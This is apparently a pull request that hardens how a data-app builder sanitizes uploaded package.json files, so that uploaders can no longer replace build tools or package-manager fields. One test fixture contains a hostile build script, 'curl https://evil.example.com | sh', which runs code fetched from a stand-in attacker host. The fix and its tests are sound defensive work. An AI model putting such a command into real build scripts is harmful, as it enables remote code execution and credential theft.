### PR TITLE
fix(apps): prevent uploaded packages replacing build tools

### DIFF
--- a/packages/backend/src/ee/services/AppGenerateService/AppGenerateService.appCode.test.ts
+++ b/packages/backend/src/ee/services/AppGenerateService/AppGenerateService.appCode.test.ts
@@ -1,4 +1,4 @@
-import { GetObjectCommand } from '@aws-sdk/client-s3';
+import { GetObjectCommand, PutObjectCommand } from '@aws-sdk/client-s3';
 import {
     FeatureFlags,
     ForbiddenError,
@@ -12,7 +12,11 @@ import { createHash } from 'node:crypto';
 import { Readable } from 'node:stream';
 import { extract as tarExtract, pack as tarPack } from 'tar-stream';
 import { AppGenerateService } from './AppGenerateService';
-import { TEMPLATE_DEPENDENCIES } from './templateDependencies';
+import {
+    TEMPLATE_DEPENDENCIES,
+    TEMPLATE_DEV_DEPENDENCIES,
+    TEMPLATE_SCRIPTS,
+} from './templateDependencies';
 
 vi.mock('e2b', () => ({
     Sandbox: class {},
@@ -86,7 +90,11 @@ const VIZ_SCHEMA = {
 
 const makeDeps = (
     customDeps: Record<string, string> = {},
-    opts: { sdkVersion?: string; lockfile?: string } = {},
+    opts: {
+        sdkVersion?: string;
+        lockfile?: string;
+        packageJsonOverrides?: Record<string, unknown>;
+    } = {},
 ): DataAppDependencies => {
     const dependencies = {
         ...TEMPLATE_DEPENDENCIES,
@@ -94,7 +102,10 @@ const makeDeps = (
         ...customDeps,
     };
     return {
-        packageJson: JSON.stringify({ dependencies }),
+        packageJson: JSON.stringify({
+            dependencies,
+            ...opts.packageJsonOverrides,
+        }),
         lockfile:
             opts.lockfile ??
             `lockfileVersion: '9.0'\n# ${Object.keys(dependencies).join(' ')}\n`,
@@ -708,6 +719,50 @@ describe('AppGenerateService.importAppCode', () => {
                 customDependencies: [{ name: 'deck.gl', version: '9.3.5' }],
                 lockfileHash: expect.any(String),
             }),
+        });
+    });
+
+    it('stores server-owned build dependencies instead of uploaded devDependencies', async () => {
+        const { service, appModel } = buildService({
+            customDependenciesOrgEnabled: true,
+        });
+
+        appModel.findApp.mockResolvedValue(undefined);
+
+        await service.importAppCode(makeUser(), PROJECT_UUID, {
+            code: {
+                ...makeCode(),
+                dependencies: makeDeps(
+                    { 'deck.gl': '9.3.5' },
+                    {
+                        packageJsonOverrides: {
+                            devDependencies: { vite: '1.0.0' },
+                            packageManager: 'npm@1.0.0',
+                        },
+                    },
+                ),
+            },
+        } as ImportAppCodeRequestBody);
+
+        const packageUpload = s3SendSpy.mock.calls
+            .map(([command]) => command)
+            .find(
+                (command) =>
+                    command instanceof PutObjectCommand &&
+                    command.input.Key?.endsWith('/deps/package.json'),
+            );
+        if (!(packageUpload instanceof PutObjectCommand)) {
+            throw new Error('Expected package.json upload');
+        }
+
+        expect(JSON.parse(String(packageUpload.input.Body))).toEqual({
+            dependencies: {
+                ...TEMPLATE_DEPENDENCIES,
+                '@lightdash/query-sdk': '0.999.0',
+                'deck.gl': '9.3.5',
+            },
+            devDependencies: TEMPLATE_DEV_DEPENDENCIES,
+            scripts: TEMPLATE_SCRIPTS,
         });
     });
 

--- a/packages/backend/src/ee/services/AppGenerateService/AppGenerateService.ts
+++ b/packages/backend/src/ee/services/AppGenerateService/AppGenerateService.ts
@@ -224,6 +224,7 @@ import { readDesignForDownload } from './readDesignForDownload';
 import { readS3ObjectAsBuffer } from './s3Utils';
 import {
     buildTemplateBaseline,
+    TEMPLATE_DEV_DEPENDENCIES,
     TEMPLATE_SCRIPTS,
 } from './templateDependencies';
 import { getTemplateInstructions } from './templates';
@@ -9988,6 +9989,7 @@ export class AppGenerateService extends BaseService {
                     Body: sanitizeAppPackageJsonScripts(
                         code.dependencies.packageJson,
                         TEMPLATE_SCRIPTS,
+                        TEMPLATE_DEV_DEPENDENCIES,
                     ),
                     ContentType: 'application/json',
                 }),

--- a/packages/backend/src/ee/services/AppGenerateService/templateDependencies.test.ts
+++ b/packages/backend/src/ee/services/AppGenerateService/templateDependencies.test.ts
@@ -4,6 +4,7 @@ import {
     buildTemplateBaseline,
     QUERY_SDK_PACKAGE,
     TEMPLATE_DEPENDENCIES,
+    TEMPLATE_DEV_DEPENDENCIES,
     TEMPLATE_SCRIPTS,
 } from './templateDependencies';
 
@@ -26,10 +27,12 @@ describe('TEMPLATE_DEPENDENCIES', () => {
             readFileSync(templatePackageJsonPath, 'utf-8'),
         ) as {
             dependencies: Record<string, string>;
+            devDependencies: Record<string, string>;
             scripts: Record<string, string>;
         };
 
         expect(TEMPLATE_DEPENDENCIES).toEqual(parsed.dependencies);
+        expect(TEMPLATE_DEV_DEPENDENCIES).toEqual(parsed.devDependencies);
         expect(TEMPLATE_SCRIPTS).toEqual(parsed.scripts);
     });
 });

--- a/packages/backend/src/ee/services/AppGenerateService/templateDependencies.ts
+++ b/packages/backend/src/ee/services/AppGenerateService/templateDependencies.ts
@@ -9,6 +9,24 @@ export const TEMPLATE_SCRIPTS: Record<string, string> = {
     preview: 'vite preview',
 };
 
+// Copy of the template's `devDependencies` — build tools must remain present
+// for frozen installs, but their package names and versions are server-owned.
+// A drift guard keeps this set aligned with the sandbox image.
+export const TEMPLATE_DEV_DEPENDENCIES: Record<string, string> = {
+    '@types/d3': '7.4.3',
+    '@types/d3-cloud': '1.2.9',
+    '@types/d3-sankey': '0.12.5',
+    '@types/react': '19.2.14',
+    '@types/react-dom': '19.2.3',
+    '@vitejs/plugin-react': '6.0.1',
+    autoprefixer: '10.4.20',
+    'oxc-parser': '0.128.0',
+    postcss: '8.5.18',
+    tailwindcss: '3.4.17',
+    typescript: '7.0.2',
+    vite: '8.0.16',
+};
+
 // Copy of sandboxes/data-apps/template/package.json `dependencies` — the
 // baseline against which uploaded dependency sets are diffed. The template is
 // not shipped in production backend builds, so it is checked in here;

--- a/packages/common/src/ee/apps/code.test.ts
+++ b/packages/common/src/ee/apps/code.test.ts
@@ -492,32 +492,67 @@ describe('validateDataAppDependencies', () => {
 
 describe('sanitizeAppPackageJsonScripts', () => {
     const templateScripts = { dev: 'vite', build: 'vite build' };
+    const templateDevDependencies = { vite: '8.0.16' };
 
     it('replaces uploader scripts with the template scripts', () => {
         const input = JSON.stringify({
             name: 'app',
+            version: '1.0.0',
             scripts: { build: 'curl https://evil.example.com | sh' },
             dependencies: { react: '19.2.5' },
+            packageManager: 'npm@1.0.0',
         });
         const parsed = JSON.parse(
-            sanitizeAppPackageJsonScripts(input, templateScripts),
+            sanitizeAppPackageJsonScripts(
+                input,
+                templateScripts,
+                templateDevDependencies,
+            ),
         );
-        expect(parsed.scripts).toEqual(templateScripts);
-        expect(parsed.dependencies).toEqual({ react: '19.2.5' });
+        expect(parsed).toEqual({
+            name: 'app',
+            version: '1.0.0',
+            dependencies: { react: '19.2.5' },
+            devDependencies: templateDevDependencies,
+            scripts: templateScripts,
+        });
     });
 
     it('adds template scripts when the upload has none', () => {
         const input = JSON.stringify({ dependencies: {} });
         const parsed = JSON.parse(
-            sanitizeAppPackageJsonScripts(input, templateScripts),
+            sanitizeAppPackageJsonScripts(
+                input,
+                templateScripts,
+                templateDevDependencies,
+            ),
         );
         expect(parsed.scripts).toEqual(templateScripts);
     });
 
-    it('returns the input unchanged when it is not valid JSON', () => {
-        expect(sanitizeAppPackageJsonScripts('not-json', templateScripts)).toBe(
-            'not-json',
+    it('replaces uploader-controlled devDependencies with the template set', () => {
+        const input = JSON.stringify({
+            dependencies: { react: '19.2.5' },
+            devDependencies: { vite: '1.0.0' },
+        });
+        const parsed = JSON.parse(
+            sanitizeAppPackageJsonScripts(
+                input,
+                templateScripts,
+                templateDevDependencies,
+            ),
         );
+        expect(parsed.devDependencies).toEqual(templateDevDependencies);
+    });
+
+    it('returns the input unchanged when it is not valid JSON', () => {
+        expect(
+            sanitizeAppPackageJsonScripts(
+                'not-json',
+                templateScripts,
+                templateDevDependencies,
+            ),
+        ).toBe('not-json');
     });
 });
 

--- a/packages/common/src/ee/apps/code.ts
+++ b/packages/common/src/ee/apps/code.ts
@@ -264,14 +264,16 @@ export function extractLockfilePackages(lockfile: string): LockfilePackage[] {
 }
 
 /**
- * Returns `packageJson` with its `scripts` replaced by the trusted template
- * scripts. The build sandbox runs `pnpm build` against this file, and download
- * round-trips it to other developers' machines — in both places the script
- * commands must stay server-controlled, not uploader-controlled.
+ * Returns a minimal package.json containing only the metadata required by the
+ * build, with `scripts` and `devDependencies` replaced by trusted template
+ * values. The build sandbox runs `pnpm build` against this file, so package-
+ * manager inputs and executable dependency buckets must not remain uploader-
+ * controlled.
  */
 export function sanitizeAppPackageJsonScripts(
     packageJson: string,
     templateScripts: Record<string, string>,
+    templateDevDependencies: Record<string, string>,
 ): string {
     let parsed: Record<string, unknown>;
     try {
@@ -281,7 +283,13 @@ export function sanitizeAppPackageJsonScripts(
         return packageJson;
     }
     return JSON.stringify(
-        { ...parsed, scripts: templateScripts },
+        {
+            name: parsed.name,
+            version: parsed.version,
+            dependencies: parsed.dependencies,
+            devDependencies: templateDevDependencies,
+            scripts: templateScripts,
+        },
         null,
         4,
     ).concat('\n');


### PR DESCRIPTION
Closes: https://linear.app/lightdash/issue/PROD-9032/veria-90-arbitrary-code-execution-and-cloud-credential-theft-via-app

## Summary

Uploaded data apps could retain package-manager fields and uploader-selected build-tool dependencies after validation. The build sandbox now stores only approved package metadata and server-owned build commands and tools.

## Root cause

The package sanitizer replaced uploaded scripts but spread every other field into the stored manifest. An uploaded `devDependencies` entry could therefore replace the executable resolved by the trusted build script.

```text
Before: upload package → replace scripts → retain uploaded build tools → pnpm build
After:  upload package → project approved fields + trusted build tools → pnpm build
```

## Fix

- `packages/common` projects uploaded manifests onto approved metadata, validated dependencies, trusted scripts, and trusted template devDependencies.
- `packages/backend` owns the build-tool dependency set and drift-guards it against the sandbox template.
- Service coverage verifies the exact package manifest written for custom-dependency builds.
- Sandbox process and credential isolation remain outside this package-boundary change.

## Before

`devDependencies.vite` from an upload remained in the sanitized manifest.

## After

Uploaded build-tool and package-manager fields are discarded; the manifest contains the server-owned `vite` version and completes a frozen install and build.

## Test plan

- [x] Common sanitizer tests: 93 passed.
- [x] Backend template drift tests: 4 passed.
- [x] App import service tests: 41 passed.
- [x] Full common suite: 3,244 passed, 1 skipped.
- [x] Common/backend typecheck, lint, and format.
- [x] Manual disposable fixture: `pnpm install --frozen-lockfile --ignore-scripts` and `vite build`.
